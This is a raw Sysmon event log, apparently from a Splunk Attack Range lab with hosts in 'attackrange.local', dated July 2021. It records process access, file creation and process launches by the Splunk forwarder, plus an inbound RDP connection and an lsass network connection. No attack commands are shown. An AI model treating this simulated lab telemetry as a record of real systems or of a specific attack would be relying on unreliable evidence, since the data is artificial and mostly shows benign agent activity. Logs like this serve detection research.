Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7D2938110F72FB37A3DA512BD3AA3B0,SHA256=E1B95E739A972B06215BED21787722AFE76C6BB0D92A73BAC528F0B318040BA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810035Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:50.980{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E52D4AC69D6E1BC9220B2EB57B1C912,SHA256=57E7DF142C02EF436E3605C244F4E7F8A301F3DAC4CA5676CBB2026006C4ADF4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.909{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7DE-60EB-DF7D-00000000CF01}10004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:50.878{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.862{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:50.862{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.862{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:50.862{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F7DE-60EB-DF7D-00000000CF01}10004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.862{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7DE-60EB-DF7D-00000000CF01}10004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.863{466BC892-F7DE-60EB-DF7D-00000000CF01}10004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.762{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2A803B783C51568041FB89B07BC5D19,SHA256=FBD759E885CA9E2CA1E974A49C87084558E28633260232F6EE2DC8F8E6F36642,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810034Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:50.605{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA17D342B34E15C67877BF30895DBC19,SHA256=CC1F4D49567C5F372DA16B200686AEB0355CBA15BA89535D8C06BB5F967BD597,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810033Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:50.605{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=09C55E14A0A430A8B8C2BAAE90525151,SHA256=B502599980CA73ECCD6EFF90B5417EDE41A2D9799518139ED983A506991AEF56,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000810032Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:48.806{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-30728-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 10341000x80000000000000001054067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.439{466BC892-F7DE-60EB-DE7D-00000000CF01}95249492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.177{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7DE-60EB-DE7D-00000000CF01}9524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:50.177{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.177{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:50.177{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.177{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.177{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7DE-60EB-DE7D-00000000CF01}9524C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.161{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7DE-60EB-DE7D-00000000CF01}9524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.162{466BC892-F7DE-60EB-DE7D-00000000CF01}9524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.880{466BC892-F7DF-60EB-E07D-00000000CF01}3688120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.764{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE3B341466DD7DF83C7D9AB858360704,SHA256=10668A6B153771A7FE24DBD410A26C833AB369FA4F6B44CF8C0FE25E73DC511D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810036Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:49.742{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57438-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 10341000x80000000000000001054087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.647{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.547{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7DF-60EB-E07D-00000000CF01}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:51.547{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.547{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:51.547{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.547{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.547{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F7DF-60EB-E07D-00000000CF01}368C:\Program 
